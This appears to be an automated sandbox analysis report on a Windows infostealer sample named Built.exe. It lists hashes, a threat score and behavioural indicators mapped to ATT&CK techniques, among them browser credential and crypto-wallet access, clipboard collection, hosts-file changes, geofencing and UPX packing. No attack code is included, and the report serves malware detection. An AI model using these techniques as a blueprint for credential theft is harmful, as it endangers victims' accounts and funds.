ee338d0757920d9fdce95426a8f109f1ed049083c7b158a330caa22deec76971

Analysis

max time kernel
139s
max time network
208s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-10-2024 15:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

219.5MB
MD5

1793b7ad5a312565af5c4b0e08cc3493
SHA1

0ab97f4267c6928aeb55a6c167c4de09318501bb
SHA256

ee338d0757920d9fdce95426a8f109f1ed049083c7b158a330caa22deec76971
SHA512

3c1c6dcac67b5b0c1243f80c02f8a563c30a0901622a0a03052ce0aaf9e9dc3da711ce853e18099f26f809bc436e938953b5e6450ae8535bd00d34b6dfc0605d
SSDEEP

3145728:CqOGp8nPQG1QTgMSs/mdcGVulvIBawW2Tv4Tge6m6P3faoOoB3YOj/+Z+01qCFC3:tinPZkmdcGVvRW2s6m6/nYOiZ+oqR9

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1540	powershell.exe
1092	powershell.exe
1508	powershell.exe
2432	powershell.exe
4264	powershell.exe
5008	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	bound.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4468	cmd.exe
2716	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
1264	bound.exe
2324	bound.exe
3784	rar.exe
3704	dotnet-sdk-8.0.403-win-x64.exe
1224	dotnet.exe

Loads dropped DLL 64 IoCs

pid	Process
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2884	Built.exe
2324	bound.exe
1548	MsiExec.exe
1548	MsiExec.exe
2784	MsiExec.exe
2784	MsiExec.exe
8	MsiExec.exe
8	MsiExec.exe
8	MsiExec.exe
8	MsiExec.exe
4652	MsiExec.exe
4652	MsiExec.exe
4460	MsiExec.exe
4460	MsiExec.exe
4896	MsiExec.exe
4896	MsiExec.exe
3676	MsiExec.exe
3676	MsiExec.exe
3092	MsiExec.exe
5036	MsiExec.exe
5036	MsiExec.exe
1760	MsiExec.exe
1760	MsiExec.exe
4620	MsiExec.exe
1548	MsiExec.exe
404	MsiExec.exe
2284	MsiExec.exe
1408	MsiExec.exe
4692	MsiExec.exe
3292	MsiExec.exe
2184	MsiExec.exe
4632	MsiExec.exe
2580	MsiExec.exe
4132	MsiExec.exe
1964	MsiExec.exe
2192	MsiExec.exe
1400	MsiExec.exe
3676	MsiExec.exe
5032	MsiExec.exe
3000	MsiExec.exe
1224	dotnet.exe
1224	dotnet.exe
1224	dotnet.exe
1224	dotnet.exe
1224	dotnet.exe
1224	dotnet.exe
1224	dotnet.exe
1224	dotnet.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{c8a2ace2-6555-4192-bf52-f8dfb1eb7678} = "\"C:\\ProgramData\\Package Cache\\{c8a2ace2-6555-4192-bf52-f8dfb1eb7678}\\dotnet-sdk-8.0.403-win-x64.exe\" /burn.runonce"	dotnet-sdk-8.0.403-win-x64.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
35	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4536	tasklist.exe
4440	tasklist.exe
3308	tasklist.exe
2952	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2248	cmd.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000023b9d-22.dat	upx
behavioral1/memory/2884-26-0x00007FFE101F0000-0x00007FFE10853000-memory.dmp	upx
behavioral1/files/0x000a000000023b8b-29.dat	upx
behavioral1/memory/2884-31-0x00007FFE208A0000-0x00007FFE208C7000-memory.dmp	upx
behavioral1/files/0x000b000000023b9b-30.dat	upx
behavioral1/memory/2884-35-0x00007FFE20890000-0x00007FFE2089F000-memory.dmp	upx
behavioral1/files/0x000a000000023b92-50.dat	upx
behavioral1/files/0x000a000000023b91-49.dat	upx
behavioral1/files/0x000a000000023b90-48.dat	upx
behavioral1/files/0x000a000000023b8f-47.dat	upx
behavioral1/files/0x000a000000023b8e-46.dat	upx
behavioral1/files/0x000a000000023b8d-45.dat	upx
behavioral1/files/0x000a000000023b8c-44.dat	upx
behavioral1/files/0x000a000000023b8a-43.dat	upx
behavioral1/files/0x000a000000023ba2-42.dat	upx
behavioral1/files/0x000a000000023ba1-41.dat	upx
behavioral1/files/0x000a000000023ba0-40.dat	upx
behavioral1/files/0x000a000000023b9c-37.dat	upx
behavioral1/files/0x000c000000023b98-36.dat	upx
behavioral1/memory/2884-56-0x00007FFE1B920000-0x00007FFE1B94B000-memory.dmp	upx
behavioral1/memory/2884-58-0x00007FFE208D0000-0x00007FFE208E9000-memory.dmp	upx
behavioral1/memory/2884-60-0x00007FFE1AE40000-0x00007FFE1AE65000-memory.dmp	upx
behavioral1/memory/2884-62-0x00007FFE10E90000-0x00007FFE1100F000-memory.dmp	upx
behavioral1/memory/2884-66-0x00007FFE20880000-0x00007FFE2088D000-memory.dmp	upx
behavioral1/memory/2884-64-0x00007FFE1AE20000-0x00007FFE1AE39000-memory.dmp	upx
behavioral1/memory/2884-68-0x00007FFE16FA0000-0x00007FFE16FD4000-memory.dmp	upx
behavioral1/memory/2884-73-0x00007FFE10120000-0x00007FFE101EE000-memory.dmp	upx
behavioral1/memory/2884-72-0x00007FFE101F0000-0x00007FFE10853000-memory.dmp	upx
behavioral1/memory/2884-76-0x00007FFE208A0000-0x00007FFE208C7000-memory.dmp	upx
behavioral1/memory/2884-78-0x00007FFE19E80000-0x00007FFE19E94000-memory.dmp	upx
behavioral1/memory/2884-75-0x00007FFE0FBE0000-0x00007FFE10113000-memory.dmp	upx
behavioral1/memory/2884-80-0x00007FFE20680000-0x00007FFE2068D000-memory.dmp	upx
behavioral1/memory/2884-100-0x00007FFE208D0000-0x00007FFE208E9000-memory.dmp	upx
behavioral1/memory/2884-106-0x00007FFE1AE40000-0x00007FFE1AE65000-memory.dmp	upx
behavioral1/memory/2884-113-0x00007FFE119A0000-0x00007FFE11A53000-memory.dmp	upx
behavioral1/memory/2884-112-0x00007FFE10E90000-0x00007FFE1100F000-memory.dmp	upx
behavioral1/memory/2884-229-0x00007FFE20880000-0x00007FFE2088D000-memory.dmp	upx
behavioral1/memory/2884-294-0x00007FFE16FA0000-0x00007FFE16FD4000-memory.dmp	upx
behavioral1/memory/2884-358-0x00007FFE10120000-0x00007FFE101EE000-memory.dmp	upx
behavioral1/memory/2884-361-0x00007FFE0FBE0000-0x00007FFE10113000-memory.dmp	upx
behavioral1/memory/2884-362-0x00007FFE101F0000-0x00007FFE10853000-memory.dmp	upx
behavioral1/memory/2884-368-0x00007FFE10E90000-0x00007FFE1100F000-memory.dmp	upx
behavioral1/memory/2884-706-0x00007FFE119A0000-0x00007FFE11A53000-memory.dmp	upx
behavioral1/memory/2884-717-0x00007FFE10120000-0x00007FFE101EE000-memory.dmp	upx
behavioral1/memory/2884-716-0x00007FFE16FA0000-0x00007FFE16FD4000-memory.dmp	upx
behavioral1/memory/2884-715-0x00007FFE20880000-0x00007FFE2088D000-memory.dmp	upx
behavioral1/memory/2884-714-0x00007FFE1AE20000-0x00007FFE1AE39000-memory.dmp	upx
behavioral1/memory/2884-713-0x00007FFE10E90000-0x00007FFE1100F000-memory.dmp	upx
behavioral1/memory/2884-712-0x00007FFE1AE40000-0x00007FFE1AE65000-memory.dmp	upx
behavioral1/memory/2884-711-0x00007FFE208D0000-0x00007FFE208E9000-memory.dmp	upx
behavioral1/memory/2884-710-0x00007FFE1B920000-0x00007FFE1B94B000-memory.dmp	upx
behavioral1/memory/2884-709-0x00007FFE20890000-0x00007FFE2089F000-memory.dmp	upx
behavioral1/memory/2884-708-0x00007FFE208A0000-0x00007FFE208C7000-memory.dmp	upx
behavioral1/memory/2884-705-0x00007FFE20680000-0x00007FFE2068D000-memory.dmp	upx
behavioral1/memory/2884-704-0x00007FFE19E80000-0x00007FFE19E94000-memory.dmp	upx
behavioral1/memory/2884-692-0x00007FFE101F0000-0x00007FFE10853000-memory.dmp	upx
behavioral1/memory/2884-707-0x00007FFE0FBE0000-0x00007FFE10113000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\dotnet\sdk\8.0.403\Containers\tasks\net8.0\pt-BR\Microsoft.DotNet.Cli.Utils.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\fr\NuGet.Frameworks.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\DotnetTools\dotnet-watch\8.0.403-servicing.24469.19\tools\net8.0\any\BuildHost-netcore\Microsoft.Build.Locator.dll	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.NETCore.App.Ref\8.0.10\ref\net8.0\System.Threading.Thread.dll	msiexec.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.10\System.IO.Packaging.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk.Web.ProjectSystem\Sdk\Sdk.targets	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\FSharp\zh-Hant\FSharp.DependencyManager.Nuget.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\analyzers\build\config\analysislevelmaintainability_9_recommended.globalconfig	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Containers\containerize\Microsoft.Extensions.Primitives.dll	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.NETCore.App.Ref\8.0.10\ref\net8.0\System.Net.NetworkInformation.xml	msiexec.exe
File created	C:\Program Files\dotnet\sdk-manifests\8.0.100\microsoft.net.workload.mono.toolchain.net6\8.0.10\localize\WorkloadManifest.en.json	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\zh-Hans\NuGet.Protocol.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\analyzers\build\config\analysislevelmaintainability_5_all.globalconfig	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk.Publish\tools\net472\tr\Microsoft.NET.Sdk.Publish.Tasks.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.AspNetCore.App.Ref\8.0.10\ref\net8.0\Microsoft.AspNetCore.Authorization.Policy.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\NuGet.Build.Tasks.Pack\Desktop\NuGet.Build.Tasks.Pack.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Containers\tasks\net472\es\Microsoft.DotNet.Cli.Utils.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Microsoft\Microsoft.NET.Build.Extensions\net461\lib\System.Runtime.Serialization.Primitives.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk.WebAssembly\tools\net472\Microsoft.NET.Sdk.WebAssembly.Tasks.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\analyzers\build\config\analysislevelmaintainability_5_none.globalconfig	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\analyzers\build\config\analysisleveldocumentation_9_recommended_warnaserror.globalconfig	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\analyzers\build\config\analysislevelperformance_6_minimum.globalconfig	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\tools\net472\System.Memory.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\de\NuGet.Commands.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.NETCore.App.Ref\8.0.10\ref\net8.0\System.IO.UnmanagedMemoryStream.dll	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.AspNetCore.App.Ref\8.0.10\ref\net8.0\Microsoft.Extensions.DependencyInjection.Abstractions.dll	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.AspNetCore.App.Ref\8.0.10\analyzers\dotnet\cs\Microsoft.AspNetCore.App.Analyzers.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\TestHostNetFramework\System.Net.Primitives.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\analyzers\build\config\analysislevelperformance_9_none.globalconfig	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\de\Microsoft.TestPlatform.CommunicationUtilities.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.10\System.Collections.Concurrent.dll	msiexec.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.10\System.Security.AccessControl.dll	msiexec.exe
File created	C:\Program Files\dotnet\packs\NETStandard.Library.Ref\2.1.0\ref\netstandard2.1\System.Xml.XPath.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\tools\net8.0\fr\Microsoft.DotNet.PackageValidation.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\tools\net8.0\cs\Microsoft.NET.Build.Tasks.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Roslyn\bincore\zh-Hant\Microsoft.CodeAnalysis.CSharp.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.NETCore.App.Ref\8.0.10\ref\net8.0\System.Xml.XPath.XDocument.xml	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Microsoft\Microsoft.NET.Build.Extensions\net461\lib\System.Net.Http.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Containers\containerize\ru\Microsoft.NET.Build.Containers.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\ja\Microsoft.NET.Sdk.WorkloadManifestReader.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\tr\Microsoft.DotNet.Cli.Sln.Internal.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.Build.Tasks.Git\tools\net472\Microsoft.Build.Tasks.Git.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\pl\NuGet.Build.Tasks.Console.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.10\de\Microsoft.VisualBasic.Forms.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.AspNetCore.App.Ref\8.0.10\ref\net8.0\Microsoft.AspNetCore.Server.IISIntegration.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk.Worker\Sdk\Sdk.targets	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\tools\net472\ja\Microsoft.Deployment.DotNet.Releases.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\analyzers\pt-BR\Microsoft.CodeAnalysis.NetAnalyzers.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.10\System.Resources.ResourceManager.dll	msiexec.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.10\PresentationFramework.Aero.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk.Publish\targets\TransformTargets\Transforms\EnvironmentNoLocation.transform	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\analyzers\build\config\analysislevelnaming_6_all.globalconfig	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.WindowsDesktop.App.Ref\8.0.10\ref\net8.0\System.Windows.Forms.Primitives.xml	msiexec.exe
File created	C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App\8.0.10\Microsoft.Extensions.Logging.EventLog.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\it\Microsoft.DotNet.TemplateLocator.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\DotnetTools\dotnet-watch\8.0.403-servicing.24469.19\tools\net8.0\any\BuildHost-netcore\Microsoft.CodeAnalysis.Workspaces.MSBuild.BuildHost.runtimeconfig.json	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.WindowsDesktop.App.Ref\8.0.10\ref\net8.0\UIAutomationClientSideProviders.xml	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.WindowsDesktop.App.Ref\8.0.10\ref\net8.0\UIAutomationClient.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Microsoft\Microsoft.NET.Build.Extensions\Microsoft.NET.Build.Extensions.ConflictResolution.targets	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\Sdks\Microsoft.NET.Sdk\tools\net472\pt-BR\Microsoft.DotNet.ApiSymbolExtensions.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\sdk\8.0.403\DotnetTools\dotnet-format\zh-Hans\Microsoft.CodeAnalysis.Features.resources.dll	msiexec.exe
File created	C:\Program Files\dotnet\packs\Microsoft.NETCore.App.Ref\8.0.10\ref\net8.0\System.IO.dll	msiexec.exe
File created	C:\Program Files\dotnet\packs\NETStandard.Library.Ref\2.1.0\ref\netstandard2.1\System.Runtime.Serialization.Xml.dll	msiexec.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.10\cs\UIAutomationProvider.resources.dll	msiexec.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\Installer\SourceHash{938CE44A-DE2E-4B59-BDB7-D515A41AA029}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI104E.tmp	msiexec.exe
File created	C:\Windows\Installer\e57cfd1.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57cfd2.msi	msiexec.exe
File created	C:\Windows\Installer\e57d008.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\e57cfad.msi	msiexec.exe
File created	C:\Windows\Installer\e57cfc2.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57d01d.msi	msiexec.exe
File created	C:\Windows\Installer\e57d021.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57d022.msi	msiexec.exe
File created	C:\Windows\Installer\e57cfeb.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{116EF6D0-AE8E-4E6D-B0D8-EFF145CD45DA}	msiexec.exe
File created	C:\Windows\Installer\e57d003.msi	msiexec.exe
File created	C:\Windows\Installer\e57d012.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID198.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEE21.tmp	msiexec.exe
File created	C:\Windows\Installer\e57cfd6.msi	msiexec.exe
File created	C:\Windows\Installer\e57cfa9.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI934.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5D28.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI598C.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{D077A86E-0289-4522-A635-783DB1DB7E28}	msiexec.exe
File created	C:\Windows\Installer\SourceHash{EFB9E0CC-AA8A-4D24-8FDA-33E693C22688}	msiexec.exe
File created	C:\Windows\Installer\e57cfae.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI868.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e57cfeb.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA1F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID7E.tmp	msiexec.exe
File created	C:\Windows\Installer\e57cff4.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4A21.tmp	msiexec.exe
File created	C:\Windows\Installer\e57cffe.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{062CD1ED-0A3C-483C-A871-50173240C545}	msiexec.exe
File created	C:\Windows\Installer\e57cfb3.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEE80.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{68C5A4AE-1B0D-4F8C-A319-DEDFA9519A08}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI61BF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e57cff0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4646.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{15B7D0C2-F209-4C28-AF1C-FD8326F4D58A}	msiexec.exe
File opened for modification	C:\Windows\Installer\e57cfd7.msi	msiexec.exe
File created	C:\Windows\Installer\e57cfef.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2EBC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3AD5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4CA3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF598.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{141C7DD4-05D4-46E7-A924-5FDD57D47633}	msiexec.exe
File created	C:\Windows\Installer\e57cfcd.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2AB3.tmp	msiexec.exe
File created	C:\Windows\Installer\e57cfe5.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5A68.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e57cfb9.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{E20F860B-E692-4DD4-82E7-2FF06E222031}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI24E5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e57cfae.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\63337BB296F4141479799EDBF63E89A0\64.8.8795\fileCoreHostExe	msiexec.exe
File created	C:\Windows\Installer\e57cfbd.msi	msiexec.exe
File created	C:\Windows\Installer\e57cfc7.msi	msiexec.exe
File created	C:\Windows\Installer\e57cfd2.msi	msiexec.exe
File created	C:\Windows\Installer\e57cfa4.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE4E6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC64A.tmp	msiexec.exe
File created	C:\Windows\Installer\e57cffa.msi	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dotnet-sdk-8.0.403-win-x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
